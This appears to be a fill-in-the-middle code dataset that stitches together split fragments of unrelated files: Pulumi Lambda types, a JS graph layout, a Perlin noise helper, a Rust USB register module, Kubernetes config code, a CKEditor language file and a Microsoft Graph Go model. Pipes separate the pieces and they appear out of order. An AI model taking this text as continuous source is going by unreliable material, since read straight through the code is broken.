class GetFunctionDeadLetterConfigResult(dict):
def __init__(__self__, *,
target_arn: str):
pulumi.set(__self__, "target_arn", target_arn)
@property
@pulumi.getter(name="targetArn")
def target_arn(self) -> str:
return pulumi.get(self, "target_arn")
@pulumi.output_type
class GetFunctionEnvironmentResult(dict):
def __init__(__self__, *,
variables: Mapping[str, str]):
pulumi.set(__self__, "variables", variables)
@property
@pulumi.getter
def variables(self) -> Mapping[str, str]:
return pulumi.get(self, "variables")
@pulumi.output_type
class GetFunctionFileSystemConfigResult(dict):
def __init__(__self__, *,
arn: str,
local_mount_path: str):
"""
:param str arn: Unqualified (no `:QUALIFIER` or `:VERSION` suffix) Amazon Resource Name (ARN) identifying your Lambda Function. See also `qualified_arn`.
"""
pulumi.set(__self__, "arn", arn)
pulumi.set(__self__, "local_mount_path", local_mount_path)
@property
@pulumi.getter
def arn(self) -> str:
"""
Unqualified (no `:QUALIFIER` or `:VERSION` suffix) Amazon Resource Name (ARN) identifying your Lambda Function. See also `qualified_arn`.
"""
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="localMountPath")
def local_mount_path(self) -> str:
return pulumi.get(self, "local_mount_path")
@pulumi.output_type
class GetFunctionTracingConfigResult(dict):
def __init__(__self__, *,
mode: str):
pulumi.set(__self__, "mode", mode)
@property
@pulumi.getter
def mode(self) -> str:
return pulumi.get(self, "mode")
@pulumi.output_type
class GetFunctionVpcConfigResult(dict):
def __init__(__self__, *,
security_group_ids: Sequence[str],
subnet_ids: Sequence[str],
vpc_id: str):
pulumi.set(__self__, "security_group_ids", security_group_ids)
pulumi.set(__self__, "subnet_ids", subnet_ids)
pulumi.set(__self__, "vpc_id", vpc_id)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Sequence[str]:
return pulumi.get(self, "security_group_ids")
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> Sequence[str]:
return pulumi.get(self, "subnet_ids")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> str:
return pulumi.get(self, "vpc_id") | return pulumi.get(self, "untrusted_artifact_on_deployment")
|
index.esm.js | import { toPolar, toCartesian } from 'agora-graph';
import _ from 'lodash';
import { ReformatLP, Solve } from 'javascript-lp-solver';
| var key, i;
for (i = 0; i < sourceKeys.length; i++) {
key = sourceKeys[i];
if (excluded.indexOf(key) >= 0) continue;
target[key] = source[key];
}
return target;
}
var objectWithoutPropertiesLoose = _objectWithoutPropertiesLoose;
function _objectWithoutProperties(source, excluded) {
if (source == null) return {};
var target = objectWithoutPropertiesLoose(source, excluded);
var key, i;
if (Object.getOwnPropertySymbols) {
var sourceSymbolKeys = Object.getOwnPropertySymbols(source);
for (i = 0; i < sourceSymbolKeys.length; i++) {
key = sourceSymbolKeys[i];
if (excluded.indexOf(key) >= 0) continue;
if (!Object.prototype.propertyIsEnumerable.call(source, key)) continue;
target[key] = source[key];
}
}
return target;
}
var objectWithoutProperties = _objectWithoutProperties;
function _defineProperty(obj, key, value) {
if (key in obj) {
Object.defineProperty(obj, key, {
value: value,
enumerable: true,
configurable: true,
writable: true
});
} else {
obj[key] = value;
}
return obj;
}
var defineProperty = _defineProperty;
function ownKeys(object, enumerableOnly) { var keys = Object.keys(object); if (Object.getOwnPropertySymbols) { var symbols = Object.getOwnPropertySymbols(object); if (enumerableOnly) symbols = symbols.filter(function (sym) { return Object.getOwnPropertyDescriptor(object, sym).enumerable; }); keys.push.apply(keys, symbols); } return keys; }
function _objectSpread(target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] != null ? arguments[i] : {}; if (i % 2) { ownKeys(Object(source), true).forEach(function (key) { defineProperty(target, key, source[key]); }); } else if (Object.getOwnPropertyDescriptors) { Object.defineProperties(target, Object.getOwnPropertyDescriptors(source)); } else { ownKeys(Object(source)).forEach(function (key) { Object.defineProperty(target, key, Object.getOwnPropertyDescriptor(source, key)); }); } } return target; }
var diamondGraphRotation = function diamondGraphRotation(graph) {
graph.nodes.sort(function (a, b) {
return a.index - b.index;
});
var rotatedNodes = _.map(graph.nodes, function (n) {
var polar = toPolar(n);
polar.theta += Math.PI / 4;
var cart = toCartesian(polar);
return _objectSpread(_objectSpread({}, n), cart);
});
var vs = _.sortBy(rotatedNodes, 'x');
var hs = _.sortBy(rotatedNodes, 'y');
var diamonds = _.map(rotatedNodes, function (n) {
return node2Diamond(n, _.findIndex(vs, ['index', n.index]), // i'm sure it exists
_.findIndex(hs, ['index', n.index]) // i'm sure it exists
);
});
var constraints = []; // set minimize constraint
var minimize = _(diamonds).map(function (_ref) {
var index = _ref.index,
x = _ref.x,
y = _ref.y;
return "x".concat(index, " - ").concat(x, " + y").concat(index, " - ").concat(y);
}).join(' + ');
constraints.push('min: ' + minimize + ';'); // sort by index
diamonds.sort(function (a, b) {
return a.index - b.index;
}); // setting up orthogonal constraints
for (var i = 0; i < diamonds.length; i++) {
var _diamonds$i = diamonds[i],
index = _diamonds$i.index,
v = _diamonds$i.v,
h = _diamonds$i.h;
if (v + 1 < vs.length) {
// is not last
// x'_v(i) <= x'_v(i+1)
constraints.push("x".concat(index, " - x").concat(vs[v + 1].index, " <= 0;"));
}
if (h + 1 < hs.length) {
// is not last
// y'_h(i) <= y'_h(i+1)
constraints.push("y".concat(index, " - y").concat(hs[h + 1].index, " <= 0;"));
}
} // sort by x
diamonds.sort(function (a, b) {
return a.x - b.x;
});
for (var iIdx = 0; iIdx < diamonds.length; iIdx++) {
var _diamonds$iIdx = diamonds[iIdx],
_i = _diamonds$iIdx.index,
yi = _diamonds$iIdx.y,
wi = _diamonds$iIdx.wii;
var ymax = null;
var ymin = null;
for (var jIdx = iIdx + 1; jIdx < diamonds.length; jIdx++) {
var _diamonds$jIdx = diamonds[jIdx],
j = _diamonds$jIdx.index,
yj = _diamonds$jIdx.y,
wj = _diamonds$jIdx.wii; // xj >= xi
if (yi <= yj && (ymax === null || yj <= ymax)) {
//wi is not width
constraints.push("x".concat(j, " - x").concat(_i, " + y").concat(j, " - y").concat(_i, " >= ").concat(wi + wj, ";"));
ymax = yj;
}
if (yi >= yj && (ymin === null || yj >= ymin)) {
constraints.push("x".concat(j, " - x").concat(_i, " - y").concat(j, " + y").concat(_i, " >= ").concat(wi + wj, ";"));
ymin = yj;
}
}
} // minimal position constraint
for (var _index = 0; _index < diamonds.length; _index++) {
var _diamonds$_index = diamonds[_index],
_i2 = _diamonds$_index.index,
x = _diamonds$_index.x,
y = _diamonds$_index.y;
constraints.push("x".concat(_i2, " >= ").concat(x, ";"));
constraints.push("y".concat(_i2, " >= ").concat(y, ";"));
} // transform to js constraint
var lpsolve = constraints.join('\n');
var tmodel = ReformatLP(lpsolve); // console.log(lpsolve);
var solver = Solve(tmodel);
var feasible = solver.feasible,
result = solver.result,
bounded = solver.bounded,
rest = objectWithoutProperties(solver, ["feasible", "result", "bounded"]); // index => {x?: y:?}
var positions = _.transform(rest, function (result, val, key) {
var tpe = key.substr(0, 1);
var index = key.substr(1);
(result[index] || (result[index] = {}))[tpe] = val;
}, {}); // rotate back to cartesian
var rotatedPos = {};
_.forEach(diamonds, function (_ref2) {
var index = _ref2.index,
x = _ref2.x,
y = _ref2.y;
var position = {
x: positions[index] && positions[index].x ? positions[index].x : x,
y: positions[index] && positions[index].y ? positions[index].y : y
};
var polar = toPolar(position);
polar.theta -= Math.PI / 4;
rotatedPos[index] = toCartesian(polar);
}); // map to nodes
var updatedNodes = _.map(graph.nodes, function (_ref3) {
var index = _ref3.index,
x = _ref3.x,
y = _ref3.y,
rest = objectWithoutProperties(_ref3, ["index", "x", "y"]);
return _objectSpread(_objectSpread({
index: index
}, rest), rotatedPos[index]);
}); // console.log(JSON.stringify(graph));
// console.log(JSON.stringify(diamonds));
// console.log(
// JSON.stringify(
// diamonds.map(({ wii: width, height, ...d }) => {
// const update: any = {};
// if (positions[d.index]) {
// if (positions[d.index].x) update.x = positions[d.index].x;
// if (positions[d.index].y) update.y = positions[d.index].y;
// }
// return { ...d, ...update, width: width * 2, height: height * 2 };
// })
// )
// );
return {
graph: {
nodes: updatedNodes,
edges: graph.edges
}
};
};
function node2Diamond(_ref4, v, h) {
var x = _ref4.x,
y = _ref4.y,
width = _ref4.width,
height = _ref4.height,
index = _ref4.index;
return {
index: index,
x: x,
y: y,
v: v,
h: h,
wii: Math.max(height, width) / 2 * Math.SQRT2
};
}
export { diamondGraphRotation }; | function _objectWithoutPropertiesLoose(source, excluded) {
if (source == null) return {};
var target = {};
var sourceKeys = Object.keys(source); |
localeText.ts | export interface ISetFilterLocaleText {
loadingOoo: string;
blanks: string;
searchOoo: string;
selectAll: string;
selectAllSearchResults: string;
noMatches: string;
}
export const DEFAULT_LOCALE_TEXT: ISetFilterLocaleText = { | searchOoo: 'Search...',
selectAll: 'Select All',
selectAllSearchResults: 'Select All Search Results',
noMatches: 'No matches.'
}; | loadingOoo: 'Loading...',
blanks: 'Blanks', |
perlin.js | // Function to linearly interpolate between a0 and a1
// Weight w should be in the range [0.0, 1.0]
function lerp(a0, a1, w) {
return (1.0 - w)*a0 + w*a1;
// as an alternative, this slightly faster equivalent formula can be used:
// return a0 + w*(a1 - a0);
}
// Computes the dot product of the distance and gradient vectors.
function dotGridGradient(ix, iy, x, y, Gradient) {
// Precomputed (or otherwise) gradient vectors at each grid node
//extern float Gradient[IYMAX][IXMAX][2];
// Compute the distance vector
let dx = x - ix;
let dy = y - iy;
// Compute the dot-product
return (dx*Gradient[iy][ix][0] + dy*Gradient[iy][ix][1]);
}
// Compute Perlin noise at coordinates x, y
exports.perlin = function (x, y, Gradient) {
// Determine grid cell coordinates
let x0 = Math.floor(x);
let x1 = x0 + 1;
let y0 = Math.floor(y);
let y1 = y0 + 1;
// Determine interpolation weights
// Could also use higher order polynomial/s-curve here
let sx = x - x0;
let sy = y - y0;
// Interpolate between grid point gradients
let n0, n1, ix0, ix1, value;
n0 = dotGridGradient(x0, y0, x, y, Gradient);
n1 = dotGridGradient(x1, y0, x, y, Gradient);
ix0 = lerp(n0, n1, sx);
n0 = dotGridGradient(x0, y1, x, y, Gradient);
n1 = dotGridGradient(x1, y1, x, y, Gradient);
ix1 = lerp(n0, n1, sx);
value = lerp(ix0, ix1, sy);
return value;
}
| for (let i = 0; i < y; i++) {
let row = [];
for (let j = 0; j < x; j++) {
row[j] = generateRandomUnitVector();
}
Gradient[i] = row;
}
return Gradient;
}
function generateRandomUnitVector() {
let x = Math.random();
let y = Math.random();
let mag = Math.hypot(x, y);
return [x/mag, y/mag];
} | module.exports.generateRandomGradient= function (x, y) {
let Gradient = []; |
usboepcnf_5.rs | #[doc = "Register `USBOEPCNF_5` reader"]
pub struct R(crate::R<USBOEPCNF_5_SPEC>);
impl core::ops::Deref for R {
type Target = crate::R<USBOEPCNF_5_SPEC>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl core::convert::From<crate::R<USBOEPCNF_5_SPEC>> for R {
fn from(reader: crate::R<USBOEPCNF_5_SPEC>) -> Self {
R(reader)
}
}
#[doc = "Register `USBOEPCNF_5` writer"]
pub struct W(crate::W<USBOEPCNF_5_SPEC>);
impl core::ops::Deref for W {
type Target = crate::W<USBOEPCNF_5_SPEC>;
#[inline(always)]
fn | (&self) -> &Self::Target {
&self.0
}
}
impl core::ops::DerefMut for W {
#[inline(always)]
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl core::convert::From<crate::W<USBOEPCNF_5_SPEC>> for W {
fn from(writer: crate::W<USBOEPCNF_5_SPEC>) -> Self {
W(writer)
}
}
#[doc = "Field `USBIIE` reader - USB - Transaction Interrupt indication enable"]
pub struct USBIIE_R(crate::FieldReader<bool, bool>);
impl USBIIE_R {
pub(crate) fn new(bits: bool) -> Self {
USBIIE_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for USBIIE_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `USBIIE` writer - USB - Transaction Interrupt indication enable"]
pub struct USBIIE_W<'a> {
w: &'a mut W,
}
impl<'a> USBIIE_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 2)) | ((value as u8 & 0x01) << 2);
self.w
}
}
#[doc = "Field `STALL` reader - USB - Stall Condition"]
pub struct STALL_R(crate::FieldReader<bool, bool>);
impl STALL_R {
pub(crate) fn new(bits: bool) -> Self {
STALL_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for STALL_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `STALL` writer - USB - Stall Condition"]
pub struct STALL_W<'a> {
w: &'a mut W,
}
impl<'a> STALL_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 3)) | ((value as u8 & 0x01) << 3);
self.w
}
}
#[doc = "Field `DBUF` reader - USB - Double Buffer Enable"]
pub struct DBUF_R(crate::FieldReader<bool, bool>);
impl DBUF_R {
pub(crate) fn new(bits: bool) -> Self {
DBUF_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for DBUF_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `DBUF` writer - USB - Double Buffer Enable"]
pub struct DBUF_W<'a> {
w: &'a mut W,
}
impl<'a> DBUF_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 4)) | ((value as u8 & 0x01) << 4);
self.w
}
}
#[doc = "Field `TOGGLE` reader - USB - Toggle Bit"]
pub struct TOGGLE_R(crate::FieldReader<bool, bool>);
impl TOGGLE_R {
pub(crate) fn new(bits: bool) -> Self {
TOGGLE_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for TOGGLE_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `TOGGLE` writer - USB - Toggle Bit"]
pub struct TOGGLE_W<'a> {
w: &'a mut W,
}
impl<'a> TOGGLE_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 5)) | ((value as u8 & 0x01) << 5);
self.w
}
}
#[doc = "Field `UBME` reader - USB - UBM In-Endpoint Enable"]
pub struct UBME_R(crate::FieldReader<bool, bool>);
impl UBME_R {
pub(crate) fn new(bits: bool) -> Self {
UBME_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for UBME_R {
type Target = crate::FieldReader<bool, bool>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `UBME` writer - USB - UBM In-Endpoint Enable"]
pub struct UBME_W<'a> {
w: &'a mut W,
}
impl<'a> UBME_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 7)) | ((value as u8 & 0x01) << 7);
self.w
}
}
impl R {
#[doc = "Bit 2 - USB - Transaction Interrupt indication enable"]
#[inline(always)]
pub fn usbiie(&self) -> USBIIE_R {
USBIIE_R::new(((self.bits >> 2) & 0x01) != 0)
}
#[doc = "Bit 3 - USB - Stall Condition"]
#[inline(always)]
pub fn stall(&self) -> STALL_R {
STALL_R::new(((self.bits >> 3) & 0x01) != 0)
}
#[doc = "Bit 4 - USB - Double Buffer Enable"]
#[inline(always)]
pub fn dbuf(&self) -> DBUF_R {
DBUF_R::new(((self.bits >> 4) & 0x01) != 0)
}
#[doc = "Bit 5 - USB - Toggle Bit"]
#[inline(always)]
pub fn toggle(&self) -> TOGGLE_R {
TOGGLE_R::new(((self.bits >> 5) & 0x01) != 0)
}
#[doc = "Bit 7 - USB - UBM In-Endpoint Enable"]
#[inline(always)]
pub fn ubme(&self) -> UBME_R {
UBME_R::new(((self.bits >> 7) & 0x01) != 0)
}
}
impl W {
#[doc = "Bit 2 - USB - Transaction Interrupt indication enable"]
#[inline(always)]
pub fn usbiie(&mut self) -> USBIIE_W {
USBIIE_W { w: self }
}
#[doc = "Bit 3 - USB - Stall Condition"]
#[inline(always)]
pub fn stall(&mut self) -> STALL_W {
STALL_W { w: self }
}
#[doc = "Bit 4 - USB - Double Buffer Enable"]
#[inline(always)]
pub fn dbuf(&mut self) -> DBUF_W {
DBUF_W { w: self }
}
#[doc = "Bit 5 - USB - Toggle Bit"]
#[inline(always)]
pub fn toggle(&mut self) -> TOGGLE_W {
TOGGLE_W { w: self }
}
#[doc = "Bit 7 - USB - UBM In-Endpoint Enable"]
#[inline(always)]
pub fn ubme(&mut self) -> UBME_W {
UBME_W { w: self }
}
#[doc = "Writes raw bits to the register."]
pub unsafe fn bits(&mut self, bits: u8) -> &mut Self {
self.0.bits(bits);
self
}
}
#[doc = "Output Endpoint_5: Configuration\n\nThis register you can [`read`](crate::generic::Reg::read), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [usboepcnf_5](index.html) module"]
pub struct USBOEPCNF_5_SPEC;
impl crate::RegisterSpec for USBOEPCNF_5_SPEC {
type Ux = u8;
}
#[doc = "`read()` method returns [usboepcnf_5::R](R) reader structure"]
impl crate::Readable for USBOEPCNF_5_SPEC {
type Reader = R;
}
#[doc = "`write(|w| ..)` method takes [usboepcnf_5::W](W) writer structure"]
impl crate::Writable for USBOEPCNF_5_SPEC {
type Writer = W;
}
#[doc = "`reset()` method sets USBOEPCNF_5 to value 0"]
impl crate::Resettable for USBOEPCNF_5_SPEC {
#[inline(always)]
fn reset_value() -> Self::Ux {
0
}
}
| deref |
config.go | /*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package config
import (
"sync"
"k8s.io/apimachinery/pkg/util/wait"
)
// Merger is an interface that allows funcs and structs to
// be able to receive updates and merge.
type Merger interface {
// Invoked when a change from a source is received. May also function as an incremental
// merger if you wish to consume changes incrementally. Must be reentrant when more than
// one source is defined.
Merge(source string, update interface{}) error
}
// MergeFunc implements the Merger interface
type MergeFunc func(source string, update interface{}) error
// Merge will allow an update to be merged with a source
// using MergeFunc f and return its result.
func (f MergeFunc) Merge(source string, update interface{}) error {
return f(source, update)
}
// Mux is a class for merging configuration from multiple sources. Changes are
// pushed via channels and sent to the merge function.
type Mux struct {
// Invoked when an update is sent to a source.
merger Merger
// Sources and their lock.
sourceLock sync.RWMutex
// Maps source names to channels
sources map[string]chan interface{}
} |
// NewMux creates a new mux that can merge changes from multiple sources.
func NewMux(merger Merger) *Mux {
mux := &Mux{
sources: make(map[string]chan interface{}),
merger: merger,
}
return mux
}
// Channel returns a channel where a configuration source
// can send updates of new configurations. Multiple calls with the same
// source will return the same channel. This allows change and state based sources
// to use the same channel. Different source names however will be treated as a
// union.
func (m *Mux) Channel(source string) chan interface{} {
if len(source) == 0 {
panic("Channel given an empty name")
}
m.sourceLock.Lock()
defer m.sourceLock.Unlock()
channel, exists := m.sources[source]
if exists {
return channel
}
newChannel := make(chan interface{})
m.sources[source] = newChannel
go wait.Until(func() { m.listen(source, newChannel) }, 0, wait.NeverStop)
return newChannel
}
func (m *Mux) listen(source string, listenChannel <-chan interface{}) {
for update := range listenChannel {
m.merger.Merge(source, update)
}
}
// Accessor is an interface for retrieving the current merge state.
type Accessor interface {
// MergedState returns a representation of the current merge state.
// Must be reentrant when more than one source is defined.
MergedState() interface{}
}
// AccessorFunc implements the Accessor interface.
type AccessorFunc func() interface{}
// MergedState will call and return the return value of AccessorFunc f().
func (f AccessorFunc) MergedState() interface{} {
return f()
}
// Listener interface allows for listening of changes and can invoke OnUpdate
// when a change is made.
type Listener interface {
// OnUpdate is invoked when a change is made to an object.
OnUpdate(instance interface{})
}
// ListenerFunc receives a representation of the change or object.
type ListenerFunc func(instance interface{})
// OnUpdate receives a representation of the change or object
// and invokes ListenerFunc f upon receiving the update.
func (f ListenerFunc) OnUpdate(instance interface{}) {
f(instance)
}
// Broadcaster is a struct that will contain a mutex
// and an array of Listener objects.
type Broadcaster struct {
// Listeners for changes and their lock.
listenerLock sync.RWMutex
listeners []Listener
}
// NewBroadcaster registers a set of listeners that support the Listener interface
// and notifies them all on changes.
func NewBroadcaster() *Broadcaster {
return &Broadcaster{}
}
// Add registers listener to receive updates of changes.
func (b *Broadcaster) Add(listener Listener) {
b.listenerLock.Lock()
defer b.listenerLock.Unlock()
b.listeners = append(b.listeners, listener)
}
// Notify notifies all listeners.
func (b *Broadcaster) Notify(instance interface{}) {
b.listenerLock.RLock()
listeners := b.listeners
b.listenerLock.RUnlock()
for _, listener := range listeners {
listener.OnUpdate(instance)
}
} | |
ar.js | /*
Copyright (c) 2003-2016, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license | */
CKEDITOR.plugins.setLang( 'showblocks', 'ar', {
toolbar: 'مخطط تفصيلي'
} ); |
|
media.go | package graph
import (
i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55 "github.com/microsoft/kiota/abstractions/go/serialization"
)
// Media
type Media struct {
// Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
additionalData map[string]interface{};
// Device information associated with the callee endpoint of this media.
calleeDevice *DeviceInfo;
// Network information associated with the callee endpoint of this media.
calleeNetwork *NetworkInfo;
// Device information associated with the caller endpoint of this media.
callerDevice *DeviceInfo;
// Network information associated with the caller endpoint of this media.
callerNetwork *NetworkInfo;
// How the media was identified during media negotiation stage.
label *string;
// Network streams associated with this media.
streams []MediaStream;
}
// NewMedia instantiates a new media and sets the default values.
func NewMedia()(*Media) |
// GetAdditionalData gets the AdditionalData property value. Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
func (m *Media) GetAdditionalData()(map[string]interface{}) {
if m == nil {
return nil
} else {
return m.additionalData
}
}
// GetCalleeDevice gets the calleeDevice property value. Device information associated with the callee endpoint of this media.
func (m *Media) GetCalleeDevice()(*DeviceInfo) {
if m == nil {
return nil
} else {
return m.calleeDevice
}
}
// GetCalleeNetwork gets the calleeNetwork property value. Network information associated with the callee endpoint of this media.
func (m *Media) GetCalleeNetwork()(*NetworkInfo) {
if m == nil {
return nil
} else {
return m.calleeNetwork
}
}
// GetCallerDevice gets the callerDevice property value. Device information associated with the caller endpoint of this media.
func (m *Media) GetCallerDevice()(*DeviceInfo) {
if m == nil {
return nil
} else {
return m.callerDevice
}
}
// GetCallerNetwork gets the callerNetwork property value. Network information associated with the caller endpoint of this media.
func (m *Media) GetCallerNetwork()(*NetworkInfo) {
if m == nil {
return nil
} else {
return m.callerNetwork
}
}
// GetLabel gets the label property value. How the media was identified during media negotiation stage.
func (m *Media) GetLabel()(*string) {
if m == nil {
return nil
} else {
return m.label
}
}
// GetStreams gets the streams property value. Network streams associated with this media.
func (m *Media) GetStreams()([]MediaStream) {
if m == nil {
return nil
} else {
return m.streams
}
}
// GetFieldDeserializers the deserialization information for the current model
func (m *Media) GetFieldDeserializers()(map[string]func(interface{}, i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode)(error)) {
res := make(map[string]func(interface{}, i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode)(error))
res["calleeDevice"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetObjectValue(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewDeviceInfo() })
if err != nil {
return err
}
if val != nil {
m.SetCalleeDevice(val.(*DeviceInfo))
}
return nil
}
res["calleeNetwork"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetObjectValue(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewNetworkInfo() })
if err != nil {
return err
}
if val != nil {
m.SetCalleeNetwork(val.(*NetworkInfo))
}
return nil
}
res["callerDevice"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetObjectValue(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewDeviceInfo() })
if err != nil {
return err
}
if val != nil {
m.SetCallerDevice(val.(*DeviceInfo))
}
return nil
}
res["callerNetwork"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetObjectValue(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewNetworkInfo() })
if err != nil {
return err
}
if val != nil {
m.SetCallerNetwork(val.(*NetworkInfo))
}
return nil
}
res["label"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetStringValue()
if err != nil {
return err
}
if val != nil {
m.SetLabel(val)
}
return nil
}
res["streams"] = func (o interface{}, n i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.ParseNode) error {
val, err := n.GetCollectionOfObjectValues(func () i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable { return NewMediaStream() })
if err != nil {
return err
}
if val != nil {
res := make([]MediaStream, len(val))
for i, v := range val {
res[i] = *(v.(*MediaStream))
}
m.SetStreams(res)
}
return nil
}
return res
}
func (m *Media) IsNil()(bool) {
return m == nil
}
// Serialize serializes information the current object
func (m *Media) Serialize(writer i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.SerializationWriter)(error) {
{
err := writer.WriteObjectValue("calleeDevice", m.GetCalleeDevice())
if err != nil {
return err
}
}
{
err := writer.WriteObjectValue("calleeNetwork", m.GetCalleeNetwork())
if err != nil {
return err
}
}
{
err := writer.WriteObjectValue("callerDevice", m.GetCallerDevice())
if err != nil {
return err
}
}
{
err := writer.WriteObjectValue("callerNetwork", m.GetCallerNetwork())
if err != nil {
return err
}
}
{
err := writer.WriteStringValue("label", m.GetLabel())
if err != nil {
return err
}
}
{
cast := make([]i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable, len(m.GetStreams()))
for i, v := range m.GetStreams() {
temp := v
cast[i] = i04eb5309aeaafadd28374d79c8471df9b267510b4dc2e3144c378c50f6fd7b55.Parsable(&temp)
}
err := writer.WriteCollectionOfObjectValues("streams", cast)
if err != nil {
return err
}
}
{
err := writer.WriteAdditionalData(m.GetAdditionalData())
if err != nil {
return err
}
}
return nil
}
// SetAdditionalData sets the AdditionalData property value. Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
func (m *Media) SetAdditionalData(value map[string]interface{})() {
m.additionalData = value
}
// SetCalleeDevice sets the calleeDevice property value. Device information associated with the callee endpoint of this media.
func (m *Media) SetCalleeDevice(value *DeviceInfo)() {
m.calleeDevice = value
}
// SetCalleeNetwork sets the calleeNetwork property value. Network information associated with the callee endpoint of this media.
func (m *Media) SetCalleeNetwork(value *NetworkInfo)() {
m.calleeNetwork = value
}
// SetCallerDevice sets the callerDevice property value. Device information associated with the caller endpoint of this media.
func (m *Media) SetCallerDevice(value *DeviceInfo)() {
m.callerDevice = value
}
// SetCallerNetwork sets the callerNetwork property value. Network information associated with the caller endpoint of this media.
func (m *Media) SetCallerNetwork(value *NetworkInfo)() {
m.callerNetwork = value
}
// SetLabel sets the label property value. How the media was identified during media negotiation stage.
func (m *Media) SetLabel(value *string)() {
m.label = value
}
// SetStreams sets the streams property value. Network streams associated with this media.
